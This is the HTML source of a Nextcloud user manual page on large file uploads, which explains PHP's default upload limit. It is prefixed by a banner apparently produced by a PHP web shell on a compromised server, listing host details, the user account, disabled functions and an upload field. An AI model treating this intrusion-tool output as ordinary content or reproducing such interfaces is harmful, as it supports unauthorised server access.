Server IP : 184.154.167.98 / Your IP : 3.147.68.18 Web Server : Apache System : Linux pink.dnsnetservice.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64 User : puertode ( 1767) PHP Version : 7.2.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/puertode/public_html/sesiones/core/doc/user/files/ |
Upload File : |
<!DOCTYPE html> <!--[if IE 8]><html class="no-js lt-ie9" lang="en" > <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en" > <!--<![endif]--> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Large file uploads — Nextcloud latest User Manual latest documentation</title> <link rel="stylesheet" href="../_static/css/theme.css" type="text/css" /> <link rel="stylesheet" href="../_static/pygments.css" type="text/css" /> <link rel="stylesheet" href="../_static/custom.css" type="text/css" /> <link rel="index" title="Index" href="../genindex.html" /> <link rel="search" title="Search" href="../search.html" /> <link rel="next" title="Storage quota" href="quota.html" /> <link rel="prev" title="Making anonymous uploads" href="file_drop.html" /> <script src="../_static/js/modernizr.min.js"></script> </head> <body class="wy-body-for-nav"> <div class="wy-grid-for-nav"> <nav data-toggle="wy-nav-shift" class="wy-nav-side"> <div class="wy-side-scroll"> <div class="wy-side-nav-search"> <a href="../contents.html"> <img src="../_static/logo-white.png" class="logo" alt="Logo"/> </a> <div role="search"> <form id="rtd-search-form" class="wy-form" action="../search.html" method="get"> <input type="text" name="q" placeholder="Search docs" /> <input type="hidden" name="check_keywords" value="yes" /> <input type="hidden" name="area" value="default" /> </form> </div> </div> <div class="wy-menu wy-menu-vertical" data-spy="affix" role="navigation" aria-label="main navigation"> <ul class="current"> <li class="toctree-l1"><a class="reference internal" href="../index.html">Nextcloud latest user manual introduction</a></li> <li class="toctree-l1"><a class="reference internal" href="../whats_new.html">What’s new for users in Nextcloud latest</a></li> <li class="toctree-l1"><a class="reference internal" href="../webinterface.html">The Nextcloud Web interface</a></li> <li class="toctree-l1 current"><a class="reference internal" href="index.html">Files & synchronization</a><ul class="current"> <li class="toctree-l2"><a class="reference internal" href="access_webgui.html">Accessing your files using the Nextcloud Web interface</a></li> <li class="toctree-l2"><a class="reference internal" href="access_webdav.html">Accessing Nextcloud files using WebDAV</a></li> <li class="toctree-l2"><a class="reference internal" href="gallery_app.html">Gallery app</a></li> <li class="toctree-l2"><a class="reference internal" href="deleted_file_management.html">Managing deleted files</a></li> <li class="toctree-l2"><a class="reference internal" href="desktop_mobile_sync.html">Desktop and mobile synchronization</a></li> <li class="toctree-l2"><a class="reference internal" href="encrypting_files.html">Encrypting your Nextcloud files on the server</a></li> <li class="toctree-l2"><a class="reference internal" href="federated_cloud_sharing.html">Using Federation Shares</a></li> <li class="toctree-l2"><a class="reference internal" href="file_drop.html">Making anonymous uploads</a></li> <li class="toctree-l2 current"><a class="current reference internal" href="#">Large file uploads</a></li> <li class="toctree-l2"><a class="reference internal" href="quota.html">Storage quota</a></li> <li class="toctree-l2"><a class="reference internal" href="version_control.html">Version control</a></li> <li class="toctree-l2"><a class="reference internal" href="projects.html">Projects</a></li> </ul> </li> <li class="toctree-l1"><a class="reference internal" href="../pim/index.html">Groupware</a></li> <li class="toctree-l1"><a class="reference internal" href="../userpreferences.html">Setting your preferences</a></li> <li class="toctree-l1"><a class="reference internal" href="../user_2fa.html">Using two-factor authentication</a></li> <li class="toctree-l1"><a class="reference internal" href="../session_management.html">Manage connected browsers and devices</a></li> <li class="toctree-l1"><a class="reference internal" href="../external_storage/index.html">External Storage</a></li> </ul> </div> </div> </nav> <section data-toggle="wy-nav-shift" class="wy-nav-content-wrap"> <nav class="wy-nav-top" aria-label="top navigation"> <i data-toggle="wy-nav-top" class="fa fa-bars"></i> <a href="../contents.html">Nextcloud latest User Manual</a> </nav> <div class="wy-nav-content"> <div class="rst-content style-external-links"> <div role="navigation" aria-label="breadcrumbs navigation"> <ul class="wy-breadcrumbs"> <li><a href="../contents.html">Docs</a> »</li> <li><a href="index.html">Files & synchronization</a> »</li> <li>Large file uploads</li> <li class="wy-breadcrumbs-aside"> <a href="https://github.com/nextcloud/documentation/edit/master/user_manual/files/large_file_upload.rst" class="fa fa-github"> Edit on GitHub</a> </li> </ul> <hr/> </div> <div role="main" class="document" itemscope="itemscope" itemtype="http://schema.org/Article"> <div itemprop="articleBody"> <div class="section" id="large-file-uploads"> <h1>Large file uploads<a class="headerlink" href="#large-file-uploads" title="Permalink to this headline">¶</a></h1> <p>When uploading files through the web client, Nextcloud is limited by PHP and Apache configurations. By default, PHP is configured for only 2 megabyte uploads. As this default upload limit is not entirely useful, we recommend that your Nextcloud admin increase the Nextcloud variables to sizes appropriate for users.</p> <p>Modifying certain Nextcloud variables requires administrative access. If you require larger upload limits than have been provided by the default (or already set by your administrator):</p> <ul class="simple"> <li>Contact your administrator to request an increase in these variables</li> <li>Refer to the section in the <a class="reference external" href="https://docs.nextcloud.org/server/14/admin_manual/configuration_files/big_file_upload_configuration.html">Admin Documentation</a> that describes how to manage file upload size limits.</li> </ul> </div> </div> </div> <footer> <div class="rst-footer-buttons" role="navigation" aria-label="footer navigation"> <a href="quota.html" class="btn btn-neutral float-right" title="Storage quota" accesskey="n" rel="next">Next <span class="fa fa-arrow-circle-right"></span></a> <a href="file_drop.html" class="btn btn-neutral" title="Making anonymous uploads" accesskey="p" rel="prev"><span class="fa fa-arrow-circle-left"></span> Previous</a> </div> <hr/> <div role="contentinfo"> <p> © Copyright 2020 Nextcloud GmbH </p> </div> </footer> </div> </div> </section> </div> <div class="rst-versions" data-toggle="rst-versions" role="note" aria-label="versions"> <span class="rst-current-version" data-toggle="rst-current-version"> <span class="fa fa-book"> Read the Docs</span> v: latest <span class="fa fa-caret-down"></span> </span> <div class="rst-other-versions"> <dl> <dt>Versions</dt> <dd><a href="https://docs.nextcloud.com/server/15/user_manual">15</a></dd> <dd><a href="https://docs.nextcloud.com/server/16/user_manual">16</a></dd> <dd><a href="https://docs.nextcloud.com/server/17/user_manual">17</a></dd> <dd><a href="https://docs.nextcloud.com/server/stable/user_manual">stable</a></dd> <dd><a href="https://docs.nextcloud.com/server/latest/user_manual">latest</a></dd> </dl> <dl> <dt>Downloads</dt> </dl> <dl> <dt>On Read the Docs</dt> <dd> <a href="///projects//?fromdocs=">Project Home</a> </dd> <dd> <a href="///builds//?fromdocs=">Builds</a> </dd> </dl> <hr/> Free document hosting provided by <a href="http://www.readthedocs.org">Read the Docs</a>. </div> </div> <script type="text/javascript" id="documentation_options" data-url_root="../" src="../_static/documentation_options.js"></script> <script type="text/javascript" src="../_static/jquery.js"></script> <script type="text/javascript" src="../_static/underscore.js"></script> <script type="text/javascript" src="../_static/doctools.js"></script> <script type="text/javascript" src="../_static/language_data.js"></script> <script type="text/javascript" src="../_static/js/theme.js"></script> <script type="text/javascript"> jQuery(function () { SphinxRtdTheme.Navigation.enable(true); }); </script> </body> </html>